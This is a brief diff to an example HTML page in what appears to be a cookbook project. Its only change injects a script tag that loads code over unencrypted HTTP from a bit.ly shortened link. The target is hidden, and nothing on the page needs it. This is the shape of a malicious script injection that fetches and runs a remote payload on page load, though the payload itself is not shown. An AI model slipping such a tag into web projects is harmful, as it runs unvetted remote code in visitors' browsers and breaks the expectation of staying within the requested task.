--- a/cookbook/examples/heroes/index.html
+++ b/cookbook/examples/heroes/index.html
@@ -19,5 +19,6 @@
             <h4>Don't worry, so are we</h4>
             <a href="hero-2.html">FOLLOW ALONG</a>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
